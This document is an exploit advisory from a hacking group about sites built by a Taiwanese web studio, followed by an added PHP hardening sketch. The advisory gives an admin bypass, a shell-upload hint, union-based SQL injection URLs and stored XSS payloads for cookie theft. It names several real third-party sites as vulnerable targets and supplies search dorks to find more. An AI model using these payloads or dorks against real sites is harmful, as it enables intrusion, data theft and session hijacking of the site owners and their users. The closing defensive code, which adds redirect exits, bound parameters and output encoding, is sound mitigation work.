Design by 年特資訊 - Multiple Vulnerability

2017.10.06
Credit: priv8_team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

~Exploit Title : Design by 年特資訊 - Multiple Vulnerability
~Exploit Author : priv8_team
~Home Vendor : http://net99.tw
~Date : Friday - 2017 06 October
~Test : Ubuntu 16.04 LTS (Xenial Xerus) - FireFox
~Tnx : Biskoit Pedar & RxR
-----------------------------------------
[ Description (Vendor) ]

We are a studio run jointly by a husband and wife (with business registration), and we also issue invoices. Unified Business Number: 40898804
Our studio's designers have been building websites and internal programs for nearly 20 years and have extensive experience. Our project completion rate is 99 percent, covering ordinary jobs, difficult jobs, and jobs that ordinary engineers cannot complete.
Our fees are reasonable, and we are the partner of choice for many peers in the industry.
Our areas of expertise: website production, design, architecture and user-flow planning, through to professional copywriting, visual design and layout/interface design.

[ Vulnerabilities ]

1) Admin Bypass (No Redirect)
2) Remote File Upload
3) SQL injection (Login required)
4) Stored Cross site scripting (Login required)

[PoC]

Admin Bypass :
You can bypass admin page with NoRedirect Plugin of FireFox
http://localhost:8080/admin/login.php << Add NoRedirect
http://localhost:8080/admin/ or admin.php
vuln site : http://www.girls.org.tw/admin/index.php

Remote File Upload :
http://localhost:8080/admin/upload.php
you can upload your files - if you are Clever , so You can Get Shell =)
vuln site : http://www.girls.org.tw/admin/upload.php

SQL injection :
file : edit_portfolio.php - products_index.php - edit_portfolio.php
parameter : id
Type : Basic Union Based Injection
vuln site : http://www.girls.org.tw/admin/edit_portfolio.php?id=-16%27+UNION%20SELECT%201,user(),3,4,5-- -
vuln site : http://sh-printing.com.tw/single.php?id=17%27+order+by+4--%20-
vuln site : http://www.u-hope.net/products_index.php?id=-14'+UNION SELECT 1,2,user(),4,5,6,7,8,9,10,11--+
vuln site : https://www.omniko-intl.com/products_index.php?id=-47'+UNION SELECT 1,2,user(),4,5,6-- -

Stored Cross site scripting :
http://localhost:8080/admin/edit_portfolio.php?id=16&action=save
file : edit_portfolio.php
parameter : id
Type : Stored Cross site scripting
Post Data : category="><script>alert('Xss')</script>&title="><script>alert('Xss')</script>&img=img/20170126071854.jpg&sor=2&Submit=æ+交
When you replay header with Live Http - xss stored in categories
when users or admin visited admin page - you will get Cookies or Browser-Hooking =)
vuln site : http://www.girls.org.tw/admin/edit_portfolio.php?id=16&action=save

[ Dork ]

intext:"Design by 年特資訊"
intext:"Design by 年特資訊" inurl:id=
you can find more targets =)
------------------------------------------
Special tnx: Mr_Yous3fi , Safengine , RxR And All Members of Priv8_Team
./priv8_team
#Biskoit_Pedar
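
Defensive sketch for three of the issues listed above (the no-redirect admin bypass, the `id` SQL injection and the stored XSS in `category`/`title`), added here as an example and not the vendor's or the advisory author's code. The session key `admin_id`, the `portfolio` table and its columns, and the database credentials are assumptions.

```php
<?php
// Added example: hypothetical hardened admin/edit_portfolio.php (requires PHP 8+).
declare(strict_types=1);
session_start();

// 1) Admin bypass: a Location header alone does not stop the script.
//    Without exit, the admin page is still rendered into the redirect
//    response, and a client that ignores redirects receives it.
function require_admin(): void
{
    if (empty($_SESSION['admin_id'])) {            // assumed session key
        header('Location: /admin/login.php', true, 302);
        exit;                                       // nothing below runs for anonymous users
    }
}

// 3) SQL injection: accept only a positive integer id and bind it as a
//    parameter instead of concatenating it into the query string.
function load_portfolio(PDO $db, mixed $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;                                // rejects "-16' UNION ..." style input
    }
    // Table and column names are assumptions based on the POST fields on the page.
    $stmt = $db->prepare('SELECT id, category, title, img FROM portfolio WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 4) Stored XSS: encode stored values for the HTML context at output time.
function h(?string $value): string
{
    return htmlspecialchars($value ?? '', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

require_admin();
// Placeholder DSN and credentials; real prepared statements, errors as exceptions.
$db = new PDO('mysql:host=localhost;dbname=site;charset=utf8mb4', 'app_user', 'change-me', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);
$item = load_portfolio($db, $_GET['id'] ?? null);
if ($item === null) {
    http_response_code(404);
    exit('Not found');
}
?>
<input name="category" value="<?= h($item['category']) ?>">
<input name="title" value="<?= h($item['title']) ?>">
```

The same `require_admin()` call belongs at the top of every script under `/admin/`, including `upload.php`, so that the upload handler is not reachable without a session.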

